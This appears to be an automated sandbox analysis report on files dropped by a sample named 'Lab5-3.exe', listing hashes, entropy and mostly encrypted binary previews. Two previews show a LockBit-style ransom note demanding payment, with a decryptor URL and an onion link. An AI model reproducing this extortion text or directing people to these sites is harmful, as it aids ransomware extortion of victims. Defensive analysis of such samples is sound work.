                                                                                                          SHA-512:5E6FF1FD99634095CE4537A580A5905D269D8101E21BCAB6B7037045AEC9F31CAF5784460DFC1DC16296C953809EC6CE4222044FC9610824474CAD880C34CA07
                                                                                                          Malicious:false
                                                                                                          Preview:..O.^.spq..2..4~...5........z.L?+.$*...HV..L.,.....r.;{Q.3.N7.s39...._@4...y...6&.a.S...B.....O7...885....T..8K....=...r..s[29..E..'vImsR.C:.....A.L.X0Q.w...uL7]E..of.....v...S...d...JCB..=..).{.N...@Ld...=J....N8.......pI...A.=....1.Z..q.....gp.W.-....y......F.@U."....'.~....Hn...g.wrr...C.{yW.5..b.Z....M...j_.FV<7.Y.>.l.....r..P..O.Y:g..yJ..6K..=.|....>... ..)P.!cOm.i..wqV.(.]..*.....Ff.J...({>}..A...rWS.19.fJ.].$N..#..K..C./g....)..l...4../GxF .6.."..ox.W....!...2$V..X.I.....xI...7d.............A..,..ZZ......g...#......,..E..4T9..(....*^~...|7:Z...Y(|.q.uml..3..&7.NS...k.....a....a~.....lv.).:?.n.....|#.%.KUZ=...*.-.|.~....~.....u20.e..Q/.<..?.{...n....."...X..X._c...YNp..C...sM.L.D.+>."...........'R@:..9..i.Z.......F...TRj.c..S......Q.O../n......q..2....^T"Z....l.e\.G.l.2b.......H.;....`.W0..~.............i. ....../B....S..F..u(F$.!....3.3TI...a.5..t.wE........)i.O.S.*....A...}P@:/<..^..8*....-f...qe......`B.>.J..F..r..jOR.YYx.....k
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18480
                                                                                                          Entropy (8bit):7.990314959054928
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:2yx0YVpSPyWFZs98Ic2F4HrIWc/RWxdUKaxMPvtb:2k0YVp2KWIorIF/RwyxcvZ
                                                                                                          MD5:5D9BC1185A98785BF7FD114E1C85972F
                                                                                                          SHA1:9878F8C0C15B5E6EB48E3F9CED3EE8EEEC987AB5
                                                                                                          SHA-256:7C540C2A1DB1ADEFB56CE4C799DA69B1544566E79208DCA270C5BBAE5F09859F
                                                                                                          SHA-512:EC8AC8FFC6065E54FB244FB92CC627BC0BE888EA65627CAABE9A425118C110416E4E2E4BC3074E1ADF3FE44D3677E1A4787369CE0E662A8B89880A50F941A872
                                                                                                          Malicious:true
                                                                                                          Preview:H.e..K.v..wh.l.$p~..3..?c....y.|...~[7b....c..s..D.....=5..3-k.y..z.t.I.6&.+.z.'..c.0...l...Fy.&...-).O.V.\....#..KQy.>....:............L.P..jm.P..6A....I....6.s../..).....85.V.t.It...3.N>..+......W..T@ ..~..QQ...,..._...:.......gC.._..[-.N...(^.#.M.....%.%.Y.W!.....7.<5+y.....L......^.$>.an.A.5.g.R{..u.y.....!..E2A./....*./......?......A%X.xBV0Q..eq.1...o.I@v.o..%8...A.........U...5.m+#ky......2_. P......DZ...=}.f\.<...I....7..)J.3...."..,\..+.I..s.+*..?.-2.I.,...`....k..v..$5..Ml..wBNt.qV. .J..x.3....A....p.4..!zX.#nP.bg)._O.s.t.]H|^.'J..pC.c..V......k &...X.[8...O.R]:.3....s{...-..Te..EF.qx....r.....J+.w.^g..K......Jw.J.[..fg. `q..n....cL..k8.'o..t..r.....L3M.D.;|b~.... ...^w ..}Jx.U3....DFB..kK...9.(fY.]...!._...Ru...F.v..<.IN......=...!S7R#....._..}...S!...*$....<..x..(q...a..s..Phx....W.".......cq...0*$...=..[.L..E4....Z.".&5...T6.s..?..,l..;<5...e3v:+L.._J.).6``8..Ys..n).1/b.ey...$q.2.F-....eR;..E:p.q.FK...k.!...Yg.......y..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2288
                                                                                                          Entropy (8bit):7.928404363060711
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:gf1apjBHqCd2ujVcvF4wHfUTid3hBaUoSGFcmeykEdEElU92i:QQtBcujVK43Gx0uKeY2ElUJ
                                                                                                          MD5:4B928E9DC3966A96B7277A3088BB8989
                                                                                                          SHA1:446272261A3DA665987BEAA3330FA652F409022C
                                                                                                          SHA-256:F91D8AC15533F99664711B17E4B8B08A58F20E10F6EFC1DFBF79D15D3321FF19
                                                                                                          SHA-512:E82252F2928D8F69487707A49EF901529242FA49EFBDC2F72A502CA31FE96A7BDE48D039DB70768BD24E5DCADD869DAB194252EC1779EBF1B2BF44821682C647
                                                                                                          Malicious:false
                                                                                                          Preview:....446.(L....Z..E..p.Y.M.F....Y.=f.{o.1~.X....qk.u_..`..>..u........y..6..A|3.....k...6....k........V(..a!@..h....FNIV.M/.i.a.......b.....5../..@c.}C~.....`....O.!9."[t.....c.......b.....@.~...|..H.W.o.a...y.G.>{.J.....L..Q`^.u.Y...UE..(..h...WW.......K._...(f...).........D.....B..\.......:.~."..0.C...&[......VH...S..H..g.BAW54....0!.Hd....{..........[.....F>T..y_..C...../...p{.O$.2h.z...}r.}..L....3....{c.M..tx.`...G....!z.,..+*L^=@.z^'......<.h,l....l4.*y..f...=..R.....(,....F..%Z.f.......[.W._.k)....D.Sk^f.8.W.Z..h...#e....... x..O.....=&.,.1.l.'n]...q.....Ci.........u.`.#V..i.$....m.......7>.\~MI.}..e.,L.._..Tv..=Q......t...an...c.....w.......l...XVg.\l...'|[..4...E.Ds......q......r...s`.#C-.".{[..zx..sRx.C..~......u.......F....Eyj#~....R..Od.o...?..N.VJ.4...ZXp...$c..o..........M.?wI..?.".D....R.9..r$I...0-.VC.-...D.x.A.Qa...R....h.kw.;u......#...#..{l\.|.......ky..m.+.Z.&"X......^J.,.....UP.<...]....9H.Z.H....-.....^.Q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3456
                                                                                                          Entropy (8bit):7.949319078933881
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Yua68rxk12OL5XX9XyXwPHzIGx0uKeY2ElUJ:YZtrxabm2Tr0Cb
                                                                                                          MD5:3B136C34C6AB44BF2990639E960864A6
                                                                                                          SHA1:0B96765E70754A91EFC14115E7AB41DA36C5CBB3
                                                                                                          SHA-256:1C11D151CC45558F1E07CAD8240E91B0B9FB06B0505D9FE732089C524EF67C67
                                                                                                          SHA-512:AA29B218F6AF0EF2F596A4601CA036A8997D90C12E2A4121BCF75D411371571D6649DEC1C470E787D9DBF5195D5CC282BC96945737F2993596F76DE5AC6FB2A8
                                                                                                          Malicious:false
                                                                                                          Preview:.:...3d..-y..c(.Y@F..".&.Z.1.W.S..`..eX.2U.....~....%.$.+./.z...W=......7cp.F.[ri..j2<3.....L..W.$.0sXLN.;..]..K;.n._..E."O..c....<....g..0..5..x.Y?..8a.Y...uR..D^m.N..5S..z..C....>....d@]`.H(..|......txR...K...5..2.5.z:.C..K.%.aA.....g..f.x\aB.Z...`..8..Vs.vB|...6..wI..,...H~...mv...z3Q.0U....?]Z.........9&..)u."iae.......zd...w ...`.X...n..v.[HE}.../._F8w..C1. ]...%.l.l..IJ).-.$JpH0....##.x.m.C`.e......v..=.J..S.*..i.......~V....6.?xs..&8........,.a.....$.3.0.U..kf}...-^..0.O.8.yT@...o...K..(...).5.M...YKF.".u..m.38.vt. Z.C.s....}...0f......G:.A...........W_.....h...L?R.@.D.$.e...[# =.=z|w.....N_M.x.9XD.....Q..{ j...C.....C.6.+.....3.w.W.I.7.P.P..{...@0..Q.S....u,=.......R.6o;..V......j=@:.20.w...z....o...5..IY.*.G^.R.......I..5Uiq...N.E.h.r...G..*(....[z@...R.@./..8l......C....z...-cO.9.F...n.$.vF.1.h...f.6...|SY.....T.]P..q...T.O"7')*d.........]....{.2Oa>.~zF....e%.].%J.}(7..m..{....4Mj..<0.r ....5.QU.p..=.X[T..f.8b.G.E}..T$G.\..Hz.+1..,F.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.905105871495802
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xCEPs1BL4LGi8pXgHfUTid3hBaUoSGFcmeykEdEElU92i:xCEPQi8NnGx0uKeY2ElUJ
                                                                                                          MD5:CB4ACE3A3ABD6A3496790F4C1E22DCE7
                                                                                                          SHA1:FEB0B3DBB51CF330BC35537FC7FAD486A1F90D36
                                                                                                          SHA-256:C10213065CC8781671350F58FB287036ACAD8BC90100C7FE407C2450B16A49CF
                                                                                                          SHA-512:7B0D586A70AF0F2E07827879B9F1EBC8B0E97A54AE9FA544056778712D2FF502C58C06B0B0334D5AA2E506C646154DBCD263AF185D599258BFA9B80FFAC20952
                                                                                                          Malicious:false
                                                                                                          Preview:.C.?j.gJt..{..t......oy...e..jf..b3...L.<.]L.".......r..o.&z....n\.7.YTU....W.>......H..]..k...,...3...8 ~...-.0..L..p..].,......k.......:}.!.v8z....,.<n0y.g.........*..tW.<.\f...y....4..A,.d6......#.Z.]`...vt|.h;..v|:..Wo@.,7..r...._.......T.^.c.m...='...4$-4.@.......?...7.V..O.a..M...%..W.8..$...K..0.i5Z??....R......1!...^.Fl...:....#...."G.E.......Ap.Y.C.l.,..f../..A.#.;;,e.X...gZ~......1.....a...kH:8..]......+...X'<.".....I...@..QN..J.....&.}... .nf.{o..h)o..cxG..{g...<b...e...R.....X._..U.c?V.F:..C.8A.@}k..|....@.g...Xy.G.#..Y..."....s.*..N....G..P. 61.z....Z..0&..}.^6.m.....$!qX~@!H.....(.l..u.].....9..@..OJ0..K.,..v4C.3...`...D.../_{......g+8bD..]...RO^{EM...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.9290856677251
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xiHLC9JpXVSAxRX7HfUTid3hBaUoSGFcmeykEdEElU92i:QHLmfSkXIGx0uKeY2ElUJ
                                                                                                          MD5:2BAEA82D6BA36415BA443C2B0AB9D529
                                                                                                          SHA1:C90DD063DC0375FE94DB1B78F35E01BB80406A36
                                                                                                          SHA-256:FEC6F672444351D67DC64F9DEFD8C486DD380A4EFB011EE44F6C24E812A81AE1
                                                                                                          SHA-512:2A78477D59221A3C4B59574D417262675E29F3537B90FB271CBE74E8FA80878D138ABE7A670E9F70AD0A36B7A5D8C33F32D4AFAF2A47CADD2DB75CCDD20B3889
                                                                                                          Malicious:false
                                                                                                          Preview:.Lf.=.H....+...[..DS.....W.89.o+.....S?0'.u..........6,.S...e,.../.....Y.....e....Cb.r...z..d..m..b...G.N..qB.p.C...E.q.%....H.].w...F./{>...'..2...E...}-..r.N..z..v8..qj...xU6..:...s.....Z......./........~n.'..u..d,..Q.8.......b.......K.~.D.!..y.....w_......p,0.C-b..~.cH.&y.......?Bm. i.6...ttA:bo.....j.e-..-..#}...*.1.I..S.g....'..j.&}8.f_..8*.u....@.pr.O.g...['.*..z..%.....;..-..^..Cn.'0O.m:..K.0.G'..Bl.^......Q`<.S...q.zW2XI4.K....S.=.L.\......Q....A.2.G...<.<$'....k..(l.5c0t...Y.....o.~xdA..a.[.+....> .....1*.(......n....v....."md@r...,9:T..uY...b<....._..{-.N&....b:.Ny+R.WG. .1.{s...X.^W.?...Z?P..(9k..9..c.).....h........ y.B.q#..E(Z...U">..L.......c.44..F...5..g!....7..y...S./..uS...6....g.k....?..s.M.=.;..`.....v.@...4J.pE.C^.A>z........-;.4......]b...a.. wl..H6"&.=c+.5"K.&`+M..{......._.$....f.^.KC5....%.Q".9..gOp@L......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.9037172392811295
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PGu6s8W8N+sHfUTid3hBaUoSGFcmeykEdEElU92i:D67hsGx0uKeY2ElUJ
                                                                                                          MD5:E216F168926164181E0183F97EFADEC8
                                                                                                          SHA1:3A49376A922EF255D950DD81220FEDC8B7756130
                                                                                                          SHA-256:EEE44B8097FF09B806F6BB1FD3BC3B3F280D19B2F7E2FBAABEA0A83BBCC2836C
                                                                                                          SHA-512:CCAD70F1488CD2DA33BE7E1BC8254C23D99C2A0CF2CBDF5DF80EA8CB4151A46CD000105FEEFFEC8F4C974E2214EB923D05EAE3BCFEAB3ABD2FACFDE695FEAEA2
                                                                                                          Malicious:false
                                                                                                          Preview:1..b".**5.Sq7.v...#=!1..a.....Y..g.F..._V..f...3........!..x...d9..k....".7g.64F.... .GG....X...........(.oQ.B..G.p.T...K.4..6..v....?=%y.X.zd.\...Q.r...=.....+9..}p..";_L8..+...I....r.....l.....p..f.i.wS.........1...K0f.`......[....'g...._.w..Q.@VS..;..+ex$..d&L..\.PKc.'..)x...?T[.v...5..e..!....._"2.~...R3..-.E1.kr....U.........f...o....N.GXV.$~.$...~....!1.De>......z..`...!..`...p...~...*n.7)...>.E.{U.s.3,R..$5......n..x..I....1H.n...T"9..S.....0.>.RI.W.5....*....<.T.Ixj....8Q.%c<..~-\.~A....B..~V.F.F$..g.c..P..S..S..l..Y..O..|..0....7/))..i....L....VY.Ur0$.Oe..j.$.a.....{K..._D....w.td.7..t.".b..k....CN.!..:..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.901396144353463
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0BCF457IonSsLGro2vJqay+5HfUTid3hBaUoSGFcmeykEdEElU92i:N4B1Ss6rT6Gx0uKeY2ElUJ
                                                                                                          MD5:69B106EFC6C0D14240E8BEF298293A00
                                                                                                          SHA1:7D84D15C66B7FC4D0891384F662F3E0D36AB7042
                                                                                                          SHA-256:F10BE34D2EA1462A132CEC5E4D72A4E0EF7BAB573F3C2AD585ED0368F6A24BA0
                                                                                                          SHA-512:D014B5090AD5DEBC3199B4BAD8240F7D03A7973B4F6D0E54767C7EB4C775A0D57D6C526335C04685CE10670AE6DA8166AE165F9CF57E8191C2B6CE948895262A
                                                                                                          Malicious:false
                                                                                                          Preview:2r.X.m..d^8....2...o{.5-.........*.Y..r.B...+.^!O..........g.T.?..Y......!".....M.........9{7!X.#..{..4.LZ.n6E..F.>M.f<#`*e.*pX.V.c..{h&...'u ...N9....$.aSY..{..4....A.5db.h.2P.<.&Y...VjB..b.v...w......8r..L....z...c.V..UP1...dj4k^_.Be...7...5..x.m.#.6....l.W.[.YW.+T...D..4..E..S6bmJ.<.;Y.... .Q.3..2....0.Y.N%.E.f.Fj...!o...AY4J.T{[2...l..?J.......>..:....^x?......S.K{,......k.y.. ....u...M.lG....:#&.^g..l..1.%.....JH.k...YlP...u_..G......D...S...R...9.4.....,IP..X>.....N.t.C..k.....S0O,.-....8......k.KY.........g...{<...[2(...~.....!...r{>J...........P..r......?..nR.n...-M....j\p!.@w.....T.?..a...d..@v..&.TV..m<.8........,.s.-...........i.*.m....3Q..o.Y..V...x2....9...:....r.V_..]..$a....9mB.Q.#.......9...uc2...q6i..._.g..>.n.E..1....;..b..w......R@..=U.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6464
                                                                                                          Entropy (8bit):7.967472132482764
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:HYTjZDhdrMd6cLpyFRNHJrczy2i6Bb9ltghpL6ARjVhCp20R6WR+cHPuGx0uKeYO:HYdXgXkZhcp9Behx6mjTC5sWDv90Cb
                                                                                                          MD5:170619DE14B62F882DE8F7C40CBD897C
                                                                                                          SHA1:A7F744B74AA8C7A0BD847B6EDADC087F7B7560CA
                                                                                                          SHA-256:6DD665F4B536D47DC758B89F3370B774098D643BF0FC33881821FBBCF957E804
                                                                                                          SHA-512:73FBE504D2FD4C1450CFD27488BACEA12E90621CAC404E17B6ADC7414C5503BA519DC69D03C88B14D9A5F19AC51066BE3DC0F50B20CA8D35083CB0E6FBD7B114
                                                                                                          Malicious:false
                                                                                                          Preview:.:..C.....si.YF}...6c..;.4.^......u.... D...%7..eU89...'...X#..*..=.6]Jzg.o..OV.Y..lcI.h..\..)8.jS..v,k..)....pyA...GL....L...N...(.Dl...@.......b....M.#o.;...=.M..g2..c..p7j.3...F...[..(...v.G(o.\...J.+G..,$.x(.r~...{)O...yB.gS5$...........;.y.......X6...&gP..u~.(+....K(..4.....l.K.&.h.3u..........hK..b........z[......O`.v..ZFcW. .B...vYl.R...IB.^_....?w.-..j.... ...;.......@T,.c.r.lJ.!....5.R.K.=........~.......-&..b[.l.n.I|.EL.............0..z.y(/Lv..9......b.....O......tER...F%fw.x6..NpG.....l...v".&.......?......{Iwe...~......V.....r...f....q.-......@.x.S...C..7.1`...'.<l.S....M...$.%[........x.a.i./F.i..(W..p>.R).....y.....U%.....L.3..|..F.x.D&..i.Z..+..#.....o.#.k.@.|.'.s<~..i...f..t.q.._..p........xH.,W...Q.K.....F(...}.#t\.r6..@..K. ..=QF....._...i._?!. w....l......V=Qy....m6^Xf/~.Z?.>.)....n..g-..X#]....t.MT.UZ....r..q..dw.*..5O.^8...UF!.:..o.`p>..`.>...7..K..S.`...9v?K.x...zp%*.'I...+d..Q..P[k,`.>...:/0..R...Bn.A..6.6`1+.N..4,...D&..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14112
                                                                                                          Entropy (8bit):7.986668166214094
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Mud3jSk2USAQlFxbwXD9oUoQ5LsG0vc7YqfQ6Cfm2xgRtb:L3h2UZykz+rQ5lZYB66m2CRZ
                                                                                                          MD5:8972C49E48E354705DADC95FD3E6D3DB
                                                                                                          SHA1:9C77CEA3C815C9211D511F35A35C2A022744DD06
                                                                                                          SHA-256:C7BFD0A855A184B783870A5FA88555258882EB6D4528B684FC84942CEA7A7C7C
                                                                                                          SHA-512:9268F3131B9F207E98CD15C57D06A7986D905A97381EFFB5C7BC76437C311D36872A3EA8BEE232FEC61DB422B178053B1E4DD5F045687520118969ABB0169B44
                                                                                                          Malicious:false
                                                                                                          Preview:.R.L.5.....`2,..=.p"....$.^.{l.wz..f.^.....%t.....a@..;..f.u0#.....7....Z=..t....g...q.l.xHo^.@.h.d..=.`..Yc........l.....W....M7*{A.[....;..m.d....s.$.r.'.\8.f.U....a&...&f7..$x..0$z.....f..:.1.e.+g...Q.S......v.J..b. v(........>?... .....r...`v!..}.>.GJ..U......>...j6N].v..Z.4..%.W..C....1.k8..4....Dt..W.A.<;..6..s....W.9.*..%..0K.u..b.,.7w7S...Ua.O.^{*t...|,b.X..m.......5...(...HJvQ.x..eR...w....).O.y.\....o.....r..[.0C.=?h.v....y..oKj...........E..X..w.w....jA.2%.#...OOa.n|....J`.CRT#@.9@JMtQ'...B..>k;....Ql..jn....4..Ayr.....t..C....a..r`.#..w.....o.K.*.OP..n......S...|I@9..}qD.s@..7=dfq..+..Dwj.G...sn....B.;...:.;.Q.w..#..C<.lI.... . A.. .R.}>ZE.)U7.Z..t.....H...q.E.E.s}../-.-....'/C....h..e.ce.J.W+.8.6O....#b...(a.O..@..Og`....Ct.{.n........|t..`A...q...Z..V.V."..t.ZbP.*..s.Cdi..'.8'K0..(.7QS...`..._.le..mu.L.J..A...:.y...6z...2>5...4....r.S.R..Ik.0..........6....S..p..`((V.E.....+N.]..>].# ......S+.=.!..!bI....YK.H!R.z.gK.?P.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21888
                                                                                                          Entropy (8bit):7.992775513923761
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:M7zgJh4nKbXaJwSzz2DS/VZcgGrkq7kdpqDx6uUcHVPlsiYxfrBgf2goqkKMrr3Z:MfgJyK7rSzUS/VZPGrkq7wix6dsPZ/Ov
                                                                                                          MD5:F1F17B04E9593B041869DDBB5DF6C97A
                                                                                                          SHA1:8B14051DDD9D59CDDFE09476C26F005B679B731B
                                                                                                          SHA-256:60A6502CB6BD5684CA4F0E3F7AF95D6A5E8FA449DC4A584F1B941BB1A4F3F75F
                                                                                                          SHA-512:6546FA16032DACC10A28D7DA85CBDB167709E48CABEFBAE58440D752ABB94FA63467291B5EAD485DB19DF915619D44D780A239A28D59E463A5C7FEACB896A149
                                                                                                          Malicious:true
                                                                                                          Preview:4C..X..D.W....?..+y.e.F....<..S....,........S(.a)Q..}......dH8.W..E...W.,.X..6...%.SSw.Jeu@.t.;...4b.....?..e.K...V.dQ..r..}..>.../G......8..Pz.'..!VO..oU..3>f$8...(...w...."...{....b.B...U.....\VaH.......A.......s`.%...T..?..+.C..Y:I..D.I.._.........=....:.a...F..Ch.. .D.}).vw...t6M.[..I...&E...Q.O...(..S..h.K..HW07"..W.....d]..U^,P.y9..#.=.........w.9.*._...o............L./..<.,...V6...*..(T...APT.Y&.O&[..@.....:6*.J.1x,..yP.UNXJX.c....'8..@w.F'.5<.S.)......n...t....E...m:@.....n.j*.p.g._..=.....6........k>..sY#.%...h.j...[..Z.-+......... ..>.......6..Q..FO...$.b..L.~)U..!C......<....u..\9.*c&a`...%j..M.}.K...S...{....9.0..j./..4..MvO.TE...Z...{.V....g)a&r)...L..+..%.R.7..W7m.z.J.....e.]fQKx....G0/e....r...q.|....?.....^w...>...?x...T.R..."Gu?..e...B.4%.......6b.h:.dg.7.C.....n.....x]...C.)..T..1..p.D..\n...l.....~..W-.]Gb.................6.../OW#..;...."L2..Bo.}.....k.k5'.a.....,.S..ok.A..../6.b.....~...z)f...a....i!.VS........OV6.p
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):69376
                                                                                                          Entropy (8bit):7.997326779428566
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:5jeAKWxAV5pd5ehZrGb6rnu/OYQpo2axWYNZ:5jeNWeVBcZs6rnYop7q7NZ
                                                                                                          MD5:CC2576718249890494390DD902CE5156
                                                                                                          SHA1:8A95220BB7C0717A1101BF9C528DB551708C0C1B
                                                                                                          SHA-256:6C992D9A98F2B27E3F2FC4066DABCAC3F552A3FA4C18AB5B343149B3487310F2
                                                                                                          SHA-512:1494D380302DC8C2EA9E3198745B182624681655DA38890D8E2744B176FFDD1D8704754EF05B6B0DA79FBE5DCB25897CDA885B9DCF62AC7F335FE9B4AE58171B
                                                                                                          Malicious:true
                                                                                                          Preview:y......(....j.!.>....P..?EDr<.~#.6..).K6...Q..D..|.PKY...q.&I.?....l..t..}y..X.....7L...^...a...X.l..,......w..S.........KL.r/.<.%...V......d#|..0."...cm;a..$v....Z.V..2........d..5..s.r'..!..6..4...NO..rY&K......PfE=..G.T......5|..e.....q.a..!..Ko........m.?z......\.5;.6....d.iy!.YS)7.F.w.Z.......M.A.....p.2.s..n........Y.g.d.N..4i.n..}.......^e..3S..;:n..6......O....7..\.l..b#.~.X...n...!}^'..0.q.8>....N.T.....7.}.Y%[@.....(]2..M....,.r.;I....Fv..........]6f...,8..x..ME..t.....]...h.G..*....sE-l...L.#.r..h...........9!...-...b..1?.:..V._.6.J.q.....?q_T...sDA.{..bP...f?T.`wE...y.E+i..e.lP.A..keY,..!..Y.l....Q.K.C...*rk....~.t.D.y.O..}...v..bPc..I.1g.$\...YbEC.<D....2........4......W.N.sUl.?)x`....^..]Y\."a...(..X.M!.tb3.Yj...3.F"....W......1...i..v......o..Y...O.......f..a<.".Un....pd`.(..Z......._..b.O....w".j.;3.../z..w.F....R(.V.......o.oy....i...`.....U.d.Q.g!..fJ=@....~x.w?.M*.W_.}.K.....yn}.....^G^uI..HP.W;.....W.B4s..1..:;.V.:
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9488
                                                                                                          Entropy (8bit):7.980712466690057
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Ayj6Jf9LTceROamEoxnYSNxpJJLh8p8cPz+1zV70Cb:AyjaV7OEMh7Dl8p8G+1Ztb
                                                                                                          MD5:347C14850505654C8A4E7FA980ECB82A
                                                                                                          SHA1:D580758F62A14EA26F93FAEE5E040D3DE9C3E4A6
                                                                                                          SHA-256:8F983C31A4A31BB8EA8E04B02D20282A9C9921CECDE0B9F983C5A0B4CCBDDA43
                                                                                                          SHA-512:106166E9B2AC71594867C6869F2783E995BA6FE0FFCFD1E44B531DE64964232CE1A106FED274A5751EEF6D36CC26214EC416CB07438BF8A828F3D8EB3AFD50EF
                                                                                                          Malicious:false
